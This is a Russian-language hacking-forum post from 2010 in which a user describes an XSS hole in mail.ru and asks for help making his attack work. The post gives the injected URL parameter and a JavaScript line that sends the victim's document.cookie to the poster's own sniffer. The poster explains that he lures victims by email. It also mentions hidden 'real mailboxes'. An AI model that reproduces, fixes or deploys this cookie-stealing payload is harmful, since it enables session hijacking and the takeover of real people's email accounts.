Тема: XSS Вопрос
Показать сообщение отдельно

  #2  
Старый 18.01.2010, 01:00
PacMan
Новичок
Регистрация: 18.12.2009
Сообщений: 25
С нами: 8630966

Репутация: 1
По умолчанию

1. У меня есть уязвимость xss mail.ru, ?inf=">alert('OK')
2. В index.html вот ...?inf=">
3. В xss.js вот img = new Image(); img.src = "http://мой сайт/jpg/s.jpg?"+document.cookie;
Сниффер свой.

Проблема вот с чем, посылаю письмо, переходит на уязвимую страницу и все, cookies нет.
Проблема думаю в 3., только незнаю как исправить.
Кто может, помогите.

Еще вот:

Скрытый текст (вы должны быть авторизованы и иметь 15 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Это настоящие почтовые ящики ... или нет?
 
Ответить с цитированием